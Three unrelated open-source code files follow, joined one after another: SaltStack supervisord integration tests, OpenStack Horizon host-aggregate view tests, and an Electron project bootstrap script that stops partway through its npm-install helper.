        self.venv_test_dir = os.path.join(RUNTIME_VARS.TMP, "supervisortests")
        self.venv_dir = os.path.join(self.venv_test_dir, "venv")
        self.supervisor_sock = os.path.join(self.venv_dir, "supervisor.sock")

        if not os.path.exists(self.venv_dir):
            # exist_ok guards against a stale test dir whose venv was removed.
            os.makedirs(self.venv_test_dir, exist_ok=True)
            self.run_function("virtualenv.create", [self.venv_dir])
            self.run_function(
                "pip.install", [], pkgs="supervisor", bin_env=self.venv_dir
            )

        self.supervisord = os.path.join(self.venv_dir, "bin", "supervisord")
        if not os.path.exists(self.supervisord):
            self.skipTest("Failed to install supervisor in test virtualenv")
        self.supervisor_conf = os.path.join(self.venv_dir, "supervisor.conf")

    def start_supervisord(self, autostart=True):
        """Render the supervisor config from the jinja template and launch
        supervisord; skip the test if the daemon or its control socket never
        comes up."""
        self.run_state(
            "file.managed",
            name=self.supervisor_conf,
            source="salt://supervisor.conf",
            template="jinja",
            context={
                "supervisor_sock": self.supervisor_sock,
                "virtual_env": self.venv_dir,
                "autostart": autostart,
            },
        )
        if not os.path.exists(self.supervisor_conf):
            self.skipTest("failed to create supervisor config file")
        self.supervisor_proc = subprocess.Popen(
            [self.supervisord, "-c", self.supervisor_conf]
        )
        # poll() is not None => the daemon already exited.
        if self.supervisor_proc.poll() is not None:
            self.skipTest("failed to start supervisord")
        # Wait up to ~10 seconds for the control socket to appear.
        timeout = 10
        while not os.path.exists(self.supervisor_sock):
            if timeout == 0:
                # skipTest raises, so no explicit loop exit is needed.
                self.skipTest(
                    "supervisor socket not found - failed to start supervisord"
                )
            time.sleep(1)
            timeout -= 1

    def tearDown(self):
        """Shut down supervisord if it is still running and drop per-test
        attributes."""
        # Fix: poll() is None means the daemon is *still running* and needs a
        # shutdown. The previous `is not None` check only "shut down" daemons
        # that had already exited and leaked any live supervisord process.
        if hasattr(self, "supervisor_proc") and self.supervisor_proc.poll() is None:
            self.run_function(
                "supervisord.custom",
                ["shutdown"],
                conf_file=self.supervisor_conf,
                bin_env=self.venv_dir,
            )
            self.supervisor_proc.wait()
        # Attributes may be missing when setUp skipped early, so guard the
        # deletions instead of raising AttributeError from tearDown.
        for attr in (
            "supervisor_proc",
            "venv_test_dir",
            "venv_dir",
            "supervisord",
            "supervisor_conf",
            "supervisor_sock",
        ):
            if hasattr(self, attr):
                delattr(self, attr)

    def test_running_stopped(self):
        """
        supervisord.running restart = False
        When service is stopped.
        """
        self.start_supervisord(autostart=False)
        ret = self.run_state(
            "supervisord.running",
            name="sleep_service",
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)
        self.assertInSaltReturn("sleep_service", ret, ["changes"])

    def test_running_started(self):
        """
        supervisord.running restart = False
        When service is running.
        """
        self.start_supervisord(autostart=True)
        ret = self.run_state(
            "supervisord.running",
            name="sleep_service",
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)
        self.assertNotInSaltReturn("sleep_service", ret, ["changes"])

    def test_running_needsupdate(self):
        """
        supervisord.running restart = False
        When service needs to be added.
        """
        self.start_supervisord(autostart=False)
        self.run_function(
            "supervisord.remove",
            ["sleep_service", None, self.supervisor_conf, self.venv_dir],
        )
        ret = self.run_state(
            "supervisord.running",
            name="sleep_service",
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)
        self.assertInSaltReturn("sleep_service", ret, ["changes"])

    def test_running_notexists(self):
        """
        supervisord.running restart = False
        When service doesn't exist.
        """
        self.start_supervisord(autostart=True)
        ret = self.run_state(
            "supervisord.running",
            name="does_not_exist",
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltFalseReturn(ret)

    def test_restart_started(self):
        """
        supervisord.running restart = True
        When service is running.
        """
        self.start_supervisord(autostart=True)
        ret = self.run_state(
            "supervisord.running",
            name="sleep_service",
            restart=True,
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)
        self.assertInSaltReturn("sleep_service", ret, ["changes"])

    def test_restart_stopped(self):
        """
        supervisord.running restart = True
        When service is stopped.
        """
        self.start_supervisord(autostart=False)
        ret = self.run_state(
            "supervisord.running",
            name="sleep_service",
            restart=True,
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)
        self.assertInSaltReturn("sleep_service", ret, ["changes"])

    def test_restart_needsupdate(self):
        """
        supervisord.running restart = True
        When service needs to be added.
        """
        self.start_supervisord(autostart=False)
        self.run_function(
            "supervisord.remove",
            ["sleep_service", None, self.supervisor_conf, self.venv_dir],
        )
        ret = self.run_state(
            "supervisord.running",
            name="sleep_service",
            restart=True,
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)
        self.assertInSaltReturn("sleep_service", ret, ["changes"])

    def test_restart_notexists(self):
        """
        supervisord.running restart = True
        When service does not exist.
        """
        self.start_supervisord(autostart=True)
        ret = self.run_state(
            "supervisord.running",
            name="does_not_exist",
            restart=True,
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltFalseReturn(ret)
        self.assertNotInSaltReturn("sleep_service", ret, ["changes"])

    def test_dead_started(self):
        """
        supervisord.dead
        When service is running.
        """
        self.start_supervisord(autostart=True)
        ret = self.run_state(
            "supervisord.dead",
            name="sleep_service",
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)

    def test_dead_stopped(self):
        """
        supervisord.dead
        When service is stopped.
        """
        self.start_supervisord(autostart=False)
        ret = self.run_state(
            "supervisord.dead",
            name="sleep_service",
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)

    def test_dead_removed(self):
        """
        supervisord.dead
        When service needs to be added.
        """
        self.start_supervisord(autostart=False)
        self.run_function(
            "supervisord.remove",
            ["sleep_service", None, self.supervisor_conf, self.venv_dir],
        )
        ret = self.run_state(
            "supervisord.dead",
            name="sleep_service",
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)

    def test_dead_notexists(self):
        """
        supervisord.dead
        When service does not exist.
        """
        self.start_supervisord(autostart=True)
        ret = self.run_state(
            "supervisord.dead",
            name="does_not_exist",
            bin_env=self.venv_dir,
            conf_file=self.supervisor_conf,
        )
        self.assertSaltTrueReturn(ret)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from django.core.urlresolvers import reverse
from django import http
from mox3.mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.aggregates import constants
from openstack_dashboard.dashboards.admin.aggregates import workflows
from openstack_dashboard.test import helpers as test
class BaseAggregateWorkflowTests(test.BaseAdminViewTests):
    """Shared helpers for building aggregate-workflow POST data."""

    # Field name used by the membership widget of the add-hosts step.
    _HOST_FIELD_NAME = 'add_host_to_aggregate_role_member'

    @staticmethod
    def _compute_host_names(hosts):
        """Return the host names of the nova-compute members of *hosts*."""
        return [host.host_name for host in hosts
                if host.service == 'compute']

    def _get_create_workflow_data(self, aggregate, hosts=None):
        """Build form data for the create-aggregate workflow.

        Only nova-compute hosts are included in the membership field, and
        only when *hosts* is non-empty.
        """
        aggregate_info = {"name": aggregate.name,
                          "availability_zone": aggregate.availability_zone}
        if hosts:
            aggregate_info[self._HOST_FIELD_NAME] = \
                self._compute_host_names(hosts)
        return aggregate_info

    def _get_manage_workflow_data(self, aggregate, hosts=None):
        """Build form data for the manage-hosts workflow (keyed by id)."""
        aggregate_info = {"id": aggregate.id}
        if hosts:
            aggregate_info[self._HOST_FIELD_NAME] = \
                self._compute_host_names(hosts)
        return aggregate_info
class CreateAggregateWorkflowTests(BaseAggregateWorkflowTests):
    """Tests for the create-aggregate workflow view.

    NOTE: these tests use mox record/replay -- every api call recorded
    before self.mox.ReplayAll() must match the calls the view performs,
    in order unless marked InAnyOrder().
    """

    @test.create_stubs({api.nova: ('host_list', ), })
    def test_workflow_get(self):
        """GET must render the create workflow with both steps."""
        api.nova.host_list(IsA(http.HttpRequest)).AndReturn(self.hosts.list())
        self.mox.ReplayAll()
        url = reverse(constants.AGGREGATES_CREATE_URL)
        res = self.client.get(url)
        workflow = res.context['workflow']
        self.assertTemplateUsed(res, constants.AGGREGATES_CREATE_VIEW_TEMPLATE)
        self.assertEqual(workflow.name, workflows.CreateAggregateWorkflow.name)
        self.assertQuerysetEqual(
            workflow.steps,
            ['<SetAggregateInfoStep: set_aggregate_info>',
             '<AddHostsToAggregateStep: add_host_to_aggregate>'])

    @test.create_stubs({api.nova: ('host_list', 'aggregate_details_list',
                                   'aggregate_create'), })
    def _test_generic_create_aggregate(self, workflow_data, aggregate,
                                       error_count=0,
                                       expected_error_message=None):
        """POST *workflow_data* to the create view.

        When expected_error_message is None the create call is expected to
        succeed and redirect to the index; otherwise *error_count* form
        errors containing the message are asserted.
        """
        api.nova.host_list(IsA(http.HttpRequest)).AndReturn(self.hosts.list())
        api.nova.aggregate_details_list(IsA(http.HttpRequest)).AndReturn([])
        if not expected_error_message:
            api.nova.aggregate_create(
                IsA(http.HttpRequest),
                name=workflow_data['name'],
                availability_zone=workflow_data['availability_zone'],
            ).AndReturn(aggregate)
        self.mox.ReplayAll()
        url = reverse(constants.AGGREGATES_CREATE_URL)
        res = self.client.post(url, workflow_data)
        if not expected_error_message:
            self.assertNoFormErrors(res)
            self.assertRedirectsNoFollow(
                res, reverse(constants.AGGREGATES_INDEX_URL))
        else:
            self.assertFormErrors(res, error_count, expected_error_message)

    def test_create_aggregate(self):
        """Happy-path create with no hosts."""
        aggregate = self.aggregates.first()
        workflow_data = self._get_create_workflow_data(aggregate)
        self._test_generic_create_aggregate(workflow_data, aggregate)

    def test_create_aggregate_fails_missing_fields(self):
        """Blank name/availability_zone must produce a validation error."""
        aggregate = self.aggregates.first()
        workflow_data = self._get_create_workflow_data(aggregate)
        workflow_data['name'] = ''
        workflow_data['availability_zone'] = ''
        self._test_generic_create_aggregate(workflow_data, aggregate, 1,
                                            u'This field is required')

    @test.create_stubs({api.nova: ('host_list',
                                   'aggregate_details_list',
                                   'aggregate_create',
                                   'add_host_to_aggregate'), })
    def test_create_aggregate_with_hosts(self):
        """Creating with hosts must add each nova-compute host afterwards."""
        aggregate = self.aggregates.first()
        hosts = self.hosts.list()
        api.nova.host_list(IsA(http.HttpRequest)).AndReturn(self.hosts.list())
        api.nova.aggregate_details_list(IsA(http.HttpRequest)).AndReturn([])
        workflow_data = self._get_create_workflow_data(aggregate, hosts)
        api.nova.aggregate_create(
            IsA(http.HttpRequest),
            name=workflow_data['name'],
            availability_zone=workflow_data['availability_zone'],
        ).AndReturn(aggregate)
        # Only nova-compute hosts are offered, so only those get added.
        compute_hosts = []
        for host in hosts:
            if host.service == 'compute':
                compute_hosts.append(host)
        for host in compute_hosts:
            api.nova.add_host_to_aggregate(
                IsA(http.HttpRequest),
                aggregate.id, host.host_name).InAnyOrder()
        self.mox.ReplayAll()
        url = reverse(constants.AGGREGATES_CREATE_URL)
        res = self.client.post(url, workflow_data)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res,
                                     reverse(constants.AGGREGATES_INDEX_URL))

    @test.create_stubs({api.nova: ('host_list', 'aggregate_details_list', ), })
    def test_host_list_nova_compute(self):
        """The host chooser must offer exactly the nova-compute hosts."""
        hosts = self.hosts.list()
        compute_hosts = []
        for host in hosts:
            if host.service == 'compute':
                compute_hosts.append(host)
        api.nova.host_list(IsA(http.HttpRequest)).AndReturn(self.hosts.list())
        self.mox.ReplayAll()
        url = reverse(constants.AGGREGATES_CREATE_URL)
        res = self.client.get(url)
        workflow = res.context['workflow']
        step = workflow.get_step("add_host_to_aggregate")
        field_name = step.get_member_field_name('member')
        self.assertEqual(len(step.action.fields[field_name].choices),
                         len(compute_hosts))
class AggregatesViewTests(test.BaseAdminViewTests):
    """Tests for the aggregates index view and the update-aggregate form.

    NOTE: mox record/replay -- recorded api calls must match the view's
    calls in order.
    """

    @mock.patch('openstack_dashboard.api.nova.extension_supported',
                mock.Mock(return_value=False))
    @test.create_stubs({api.nova: ('aggregate_details_list',
                                   'availability_zone_list',),
                        api.cinder: ('tenant_absolute_limits',)})
    def test_panel_not_available(self):
        """The panel must be hidden when the nova extension is unsupported."""
        api.cinder.tenant_absolute_limits(IsA(http.HttpRequest)). \
            MultipleTimes().AndReturn(self.cinder_limits['absolute'])
        self.mox.ReplayAll()
        # Stop the test-harness patcher so the real panel logic runs.
        self.patchers['aggregates'].stop()
        res = self.client.get(reverse('horizon:admin:overview:index'))
        self.assertNotIn('Host Aggregates', res.content)

    @test.create_stubs({api.nova: ('aggregate_details_list',
                                   'availability_zone_list',)})
    def test_index(self):
        """Index view must list both aggregates and availability zones."""
        api.nova.aggregate_details_list(IsA(http.HttpRequest)) \
            .AndReturn(self.aggregates.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest), detailed=True) \
            .AndReturn(self.availability_zones.list())
        self.mox.ReplayAll()
        res = self.client.get(reverse(constants.AGGREGATES_INDEX_URL))
        self.assertTemplateUsed(res, constants.AGGREGATES_INDEX_VIEW_TEMPLATE)
        self.assertItemsEqual(res.context['host_aggregates_table'].data,
                              self.aggregates.list())
        self.assertItemsEqual(res.context['availability_zones_table'].data,
                              self.availability_zones.list())

    @test.create_stubs({api.nova: ('aggregate_update', 'aggregate_get',), })
    def _test_generic_update_aggregate(self, form_data, aggregate,
                                       error_count=0,
                                       expected_error_message=None):
        """POST *form_data* to the update view; assert success or errors.

        The view looks the aggregate up by (stringified) id first; the
        update call is only expected on the success path.
        """
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id))\
            .AndReturn(aggregate)
        if not expected_error_message:
            az = form_data['availability_zone']
            aggregate_data = {'name': form_data['name'],
                              'availability_zone': az}
            api.nova.aggregate_update(IsA(http.HttpRequest), str(aggregate.id),
                                      aggregate_data)
        self.mox.ReplayAll()
        res = self.client.post(reverse(constants.AGGREGATES_UPDATE_URL,
                                       args=[aggregate.id]),
                               form_data)
        if not expected_error_message:
            self.assertNoFormErrors(res)
            self.assertRedirectsNoFollow(
                res, reverse(constants.AGGREGATES_INDEX_URL))
        else:
            self.assertFormErrors(res, error_count, expected_error_message)

    def test_update_aggregate(self):
        """Happy-path rename / re-zone of an aggregate."""
        aggregate = self.aggregates.first()
        form_data = {'id': aggregate.id,
                     'name': 'my_new_name',
                     'availability_zone': 'my_new_zone'}
        self._test_generic_update_aggregate(form_data, aggregate)

    def test_update_aggregate_fails_missing_fields(self):
        """Posting without name/availability_zone must raise a form error."""
        aggregate = self.aggregates.first()
        form_data = {'id': aggregate.id}
        self._test_generic_update_aggregate(form_data, aggregate, 1,
                                            u'This field is required')
class ManageHostsTests(test.BaseAdminViewTests):
    """Tests for the manage-hosts view of an aggregate.

    NOTE: mox record/replay -- recorded api calls must match the view's
    calls; InAnyOrder() relaxes ordering where the view iterates sets.
    """

    @test.create_stubs({api.nova: ('aggregate_get', 'host_list')})
    def test_manage_hosts(self):
        """GET must render the manage-hosts template for the aggregate."""
        aggregate = self.aggregates.first()
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
            .AndReturn(aggregate)
        api.nova.host_list(IsA(http.HttpRequest)) \
            .AndReturn(self.hosts.list())
        self.mox.ReplayAll()
        res = self.client.get(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
                                      args=[aggregate.id]))
        self.assertEqual(res.status_code, 200)
        self.assertTemplateUsed(res,
                                constants.AGGREGATES_MANAGE_HOSTS_TEMPLATE)

    @test.create_stubs({api.nova: ('aggregate_get', 'add_host_to_aggregate',
                                   'remove_host_from_aggregate',
                                   'host_list')})
    def test_manage_hosts_update_add_remove_not_empty_aggregate(self):
        """Selecting a new member must remove the old hosts and add it."""
        aggregate = self.aggregates.first()
        aggregate.hosts = ['host1', 'host2']
        host = self.hosts.list()[0]
        form_data = {'manageaggregatehostsaction_role_member':
                     [host.host_name]}
        # Both pre-existing hosts get removed (order not guaranteed) ...
        api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
                                            str(aggregate.id),
                                            'host2').InAnyOrder()
        api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
                                            str(aggregate.id),
                                            'host1').InAnyOrder()
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
            .AndReturn(aggregate)
        api.nova.host_list(IsA(http.HttpRequest)) \
            .AndReturn(self.hosts.list())
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
            .AndReturn(aggregate)
        # ... and the newly selected host gets added.
        api.nova.add_host_to_aggregate(IsA(http.HttpRequest),
                                       str(aggregate.id), host.host_name)
        self.mox.ReplayAll()
        res = self.client.post(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
                                       args=[aggregate.id]),
                               form_data)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res,
                                     reverse(constants.AGGREGATES_INDEX_URL))

    @test.create_stubs({api.nova: ('aggregate_get', 'add_host_to_aggregate',
                                   'remove_host_from_aggregate',
                                   'host_list')})
    def test_manage_hosts_update_add_not_empty_aggregate_should_fail(self):
        """A failing add must surface error messages but still redirect."""
        aggregate = self.aggregates.first()
        aggregate.hosts = ['devstack001']
        host1 = self.hosts.list()[0]
        host3 = self.hosts.list()[2]
        form_data = {'manageaggregatehostsaction_role_member':
                     [host1.host_name, host3.host_name]}
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
            .InAnyOrder().AndReturn(aggregate)
        api.nova.host_list(IsA(http.HttpRequest)) \
            .InAnyOrder().AndReturn(self.hosts.list())
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
            .InAnyOrder().AndReturn(aggregate)
        # The add of host3 raises a nova exception.
        api.nova.add_host_to_aggregate(IsA(http.HttpRequest),
                                       str(aggregate.id), host3.host_name) \
            .InAnyOrder().AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        res = self.client.post(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
                                       args=[aggregate.id]),
                               form_data)
        self.assertNoFormErrors(res)
        self.assertMessageCount(error=2)
        self.assertRedirectsNoFollow(res,
                                     reverse(constants.AGGREGATES_INDEX_URL))

    @test.create_stubs({api.nova: ('aggregate_get', 'add_host_to_aggregate',
                                   'remove_host_from_aggregate',
                                   'host_list')})
    def test_manage_hosts_update_clean_not_empty_aggregate_should_fail(self):
        """A failing remove must surface error messages but still redirect."""
        aggregate = self.aggregates.first()
        aggregate.hosts = ['host2']
        form_data = {'manageaggregatehostsaction_role_member':
                     []}
        api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
                                            str(aggregate.id),
                                            'host2')\
            .AndRaise(self.exceptions.nova)
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
            .AndReturn(aggregate)
        api.nova.host_list(IsA(http.HttpRequest)) \
            .AndReturn(self.hosts.list())
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
            .AndReturn(aggregate)
        self.mox.ReplayAll()
        res = self.client.post(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
                                       args=[aggregate.id]),
                               form_data)
        self.assertNoFormErrors(res)
        self.assertMessageCount(error=2)
        self.assertRedirectsNoFollow(res,
                                     reverse(constants.AGGREGATES_INDEX_URL))

    @test.create_stubs({api.nova: ('aggregate_get', 'add_host_to_aggregate',
                                   'remove_host_from_aggregate',
                                   'host_list')})
    def _test_manage_hosts_update(self,
                                  host,
                                  aggregate,
                                  form_data,
                                  addAggregate=False,
                                  cleanAggregates=False):
        """Shared driver: record the expected remove/get/add sequence, POST
        *form_data*, and assert a clean redirect.

        Args:
            host: the host expected to be added (when addAggregate).
            aggregate: the aggregate under test.
            form_data: POST payload for the membership widget.
            addAggregate: whether an add_host_to_aggregate call is expected.
            cleanAggregates: whether removal of host1..host3 is expected.
        """
        if cleanAggregates:
            api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
                                                str(aggregate.id),
                                                'host3').InAnyOrder()
            api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
                                                str(aggregate.id),
                                                'host2').InAnyOrder()
            api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
                                                str(aggregate.id),
                                                'host1').InAnyOrder()
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
            .AndReturn(aggregate)
        api.nova.host_list(IsA(http.HttpRequest)) \
            .AndReturn(self.hosts.list())
        api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
            .AndReturn(aggregate)
        if addAggregate:
            api.nova.add_host_to_aggregate(IsA(http.HttpRequest),
                                           str(aggregate.id),
                                           host.host_name)
        self.mox.ReplayAll()
        res = self.client.post(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
                                       args=[aggregate.id]),
                               form_data)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res,
                                     reverse(constants.AGGREGATES_INDEX_URL))

    def test_manage_hosts_update_nothing_not_empty_aggregate(self):
        """Re-posting the current membership must change nothing."""
        aggregate = self.aggregates.first()
        host = self.hosts.list()[0]
        aggregate.hosts = [host.host_name]
        form_data = {'manageaggregatehostsaction_role_member':
                     [host.host_name]}
        self._test_manage_hosts_update(host,
                                       aggregate,
                                       form_data,
                                       addAggregate=False)

    def test_manage_hosts_update_nothing_empty_aggregate(self):
        """Posting an empty selection to an empty aggregate is a no-op."""
        aggregate = self.aggregates.first()
        aggregate.hosts = []
        form_data = {'manageaggregatehostsaction_role_member':
                     []}
        self._test_manage_hosts_update(None,
                                       aggregate,
                                       form_data,
                                       addAggregate=False)

    def test_manage_hosts_update_add_empty_aggregate(self):
        """Adding a host to an empty aggregate triggers a single add."""
        aggregate = self.aggregates.first()
        aggregate.hosts = []
        host = self.hosts.list()[0]
        form_data = {'manageaggregatehostsaction_role_member':
                     [host.host_name]}
        self._test_manage_hosts_update(host,
                                       aggregate,
                                       form_data,
                                       addAggregate=True)

    def test_manage_hosts_update_add_not_empty_aggregate(self):
        """Adding a second host keeps the existing member untouched."""
        aggregate = self.aggregates.first()
        aggregate.hosts = ['devstack001']
        host1 = self.hosts.list()[0]
        host3 = self.hosts.list()[2]
        form_data = {'manageaggregatehostsaction_role_member':
                     [host1.host_name, host3.host_name]}
        self._test_manage_hosts_update(host3,
                                       aggregate,
                                       form_data,
                                       addAggregate=True)

    def test_manage_hosts_update_clean_not_empty_aggregate(self):
        """Clearing the selection must remove every current host."""
        aggregate = self.aggregates.first()
        aggregate.hosts = ['host1', 'host2', 'host3']
        form_data = {'manageaggregatehostsaction_role_member':
                     []}
        self._test_manage_hosts_update(None,
                                       aggregate,
                                       form_data,
                                       addAggregate=False,
                                       cleanAggregates=True)
| |
#!/usr/bin/env python
import argparse
import os
import subprocess
import sys
from lib.config import LIBCHROMIUMCONTENT_COMMIT, BASE_URL, PLATFORM, \
enable_verbose_mode, is_verbose_mode, get_target_arch
from lib.util import execute_stdout, get_atom_shell_version, scoped_cwd
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
VENDOR_DIR = os.path.join(SOURCE_ROOT, 'vendor')
PYTHON_26_URL = 'https://chromium.googlesource.com/chromium/deps/python_26'

# On CI use the locally installed npm from node_modules; elsewhere rely on
# whatever `npm` is on PATH. (`in` replaces the Python-2-only dict.has_key.)
if 'CI' in os.environ:
  NPM = os.path.join(SOURCE_ROOT, 'node_modules', '.bin', 'npm')
else:
  NPM = 'npm'
# Windows/cygwin npm is a .cmd shim rather than an executable.
if sys.platform in ['win32', 'cygwin']:
  NPM += '.cmd'
def main():
  """Bootstrap the checkout: submodules, vendored deps, and a first update."""
  os.chdir(SOURCE_ROOT)

  args = parse_args()
  defines = args_to_defines(args)
  if not args.yes and PLATFORM != 'win32':
    check_root()
  if args.verbose:
    enable_verbose_mode()
  if sys.platform == 'cygwin':
    update_win32_python()
  update_submodules()

  libcc_source_path = args.libcc_source_path
  libcc_shared_library_path = args.libcc_shared_library_path
  libcc_static_library_path = args.libcc_static_library_path

  # Redirect to use local libchromiumcontent build.
  if args.build_libchromiumcontent:
    build_libchromiumcontent(args.verbose, args.target_arch, defines)
    dist_dir = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',
                            'libchromiumcontent', 'dist', 'main')
    libcc_source_path = os.path.join(dist_dir, 'src')
    libcc_shared_library_path = os.path.join(dist_dir, 'shared_library')
    libcc_static_library_path = os.path.join(dist_dir, 'static_library')

  if PLATFORM != 'win32':
    # Download prebuilt clang binaries.
    update_clang()

  setup_python_libs()
  update_node_modules('.')
  bootstrap_brightray(args.dev, args.url, args.target_arch,
                      libcc_source_path, libcc_shared_library_path,
                      libcc_static_library_path)
  if PLATFORM == 'linux':
    download_sysroot(args.target_arch)

  create_chrome_version_h()
  touch_config_gypi()
  run_update(defines, args.disable_clang, args.clang_dir)
  update_electron_modules('spec', args.target_arch)
def parse_args():
  """Define and parse the bootstrap command-line options."""
  parser = argparse.ArgumentParser(description='Bootstrap this project')
  parser.add_argument('-u', '--url',
                      help='The base URL from which to download '
                      'libchromiumcontent (i.e., the URL you passed to '
                      'libchromiumcontent\'s script/upload script',
                      default=BASE_URL,
                      required=False)
  parser.add_argument('-v', '--verbose',
                      action='store_true',
                      help='Prints the output of the subprocesses')
  parser.add_argument('-d', '--dev', action='store_true',
                      help='Do not download static_library build')
  parser.add_argument('-y', '--yes', '--assume-yes',
                      action='store_true',
                      help='Run non-interactively by assuming "yes" to all ' \
                           'prompts.')
  parser.add_argument('--target_arch', default=get_target_arch(),
                      help='Manually specify the arch to build for')
  parser.add_argument('--clang_dir', default='', help='Path to clang binaries')
  parser.add_argument('--disable_clang', action='store_true',
                      help='Use compilers other than clang for building')
  parser.add_argument('--build_libchromiumcontent', action='store_true',
                      help='Build local version of libchromiumcontent')
  # The three libcc_* paths must be given together (checked in
  # bootstrap_brightray); otherwise the defaults are used.
  parser.add_argument('--libcc_source_path', required=False,
                      help='The source path of libchromiumcontent. ' \
                           'NOTE: All options of libchromiumcontent are ' \
                           'required OR let electron choose it')
  parser.add_argument('--libcc_shared_library_path', required=False,
                      help='The shared library path of libchromiumcontent.')
  parser.add_argument('--libcc_static_library_path', required=False,
                      help='The static library path of libchromiumcontent.')
  return parser.parse_args()
def args_to_defines(args):
  """Translate the parsed clang-related options into a GYP defines string.

  The returned string is either empty or a concatenation of
  leading-space-prefixed `key=value` tokens, matching what run_update and
  build_libchromiumcontent expect.
  """
  pieces = []
  if args.disable_clang:
    pieces.append(' clang=0')
  if args.clang_dir:
    pieces.append(' make_clang_dir=' + args.clang_dir)
    pieces.append(' clang_use_chrome_plugins=0')
  return ''.join(pieces)
def check_root():
  """Warn when running as root and let the user bail out.

  NOTE: Python 2 only (print statement and raw_input); callers skip this on
  win32, where os.geteuid does not exist.
  """
  if os.geteuid() == 0:
    print "We suggest not running this as root, unless you're really sure."
    # Default answer is "no": anything other than y/Y aborts.
    choice = raw_input("Do you want to continue? [y/N]: ")
    if choice not in ('y', 'Y'):
      sys.exit(0)
def update_submodules():
  """Sync and initialise every git submodule, recursively."""
  for subcommand in (['sync', '--recursive'],
                     ['update', '--init', '--recursive']):
    execute_stdout(['git', 'submodule'] + subcommand)
def setup_python_libs():
  """Build the vendored pure-Python dependencies (requests, boto) in place."""
  for lib in ('requests', 'boto'):
    with scoped_cwd(os.path.join(VENDOR_DIR, lib)):
      execute_stdout([sys.executable, 'setup.py', 'build'])
def bootstrap_brightray(is_dev, url, target_arch, libcc_source_path,
                        libcc_shared_library_path,
                        libcc_static_library_path):
  """Run brightray's bootstrap script.

  The three libcc_* paths are forwarded only when all of them were supplied,
  which points brightray at a local libchromiumcontent build instead of the
  downloaded one.
  """
  bootstrap = os.path.join(VENDOR_DIR, 'brightray', 'script', 'bootstrap')
  args = [
    '--commit', LIBCHROMIUMCONTENT_COMMIT,
    '--target_arch', target_arch,
    url
  ]
  if is_dev:
    args = ['--dev'] + args
  # PEP 8: identity comparison with None instead of `!= None`.
  if (libcc_source_path is not None and
      libcc_shared_library_path is not None and
      libcc_static_library_path is not None):
    args += ['--libcc_source_path', libcc_source_path,
             '--libcc_shared_library_path', libcc_shared_library_path,
             '--libcc_static_library_path', libcc_static_library_path]
  execute_stdout([sys.executable, bootstrap] + args)
def set_clang_env(env):
  """Point CC/CXX in *env* at the prebuilt clang binaries."""
  llvm_bin = os.path.join(SOURCE_ROOT, 'vendor', 'llvm-build',
                          'Release+Asserts', 'bin')
  for var, tool in (('CC', 'clang'), ('CXX', 'clang++')):
    env[var] = os.path.join(llvm_bin, tool)
def update_node_modules(dirname, env=None):
  """Run `npm install` in *dirname*.

  On Linux native modules are compiled with the prebuilt clang. When running
  on CI, npm failures are deliberately swallowed (best-effort install).
  """
  if env is None:
    env = os.environ.copy()
  if PLATFORM == 'linux':
    # Use prebuilt clang for building native modules.
    set_clang_env(env)
    env['npm_config_clang'] = '1'
  with scoped_cwd(dirname):
    args = [NPM, 'install']
    if is_verbose_mode():
      args += ['--verbose']
    # `in` replaces the Python-2-only dict.has_key().
    if 'CI' in os.environ:
      # Ignore npm install errors when running in CI.
      try:
        execute_stdout(args, env)
      except subprocess.CalledProcessError:
        pass
    else:
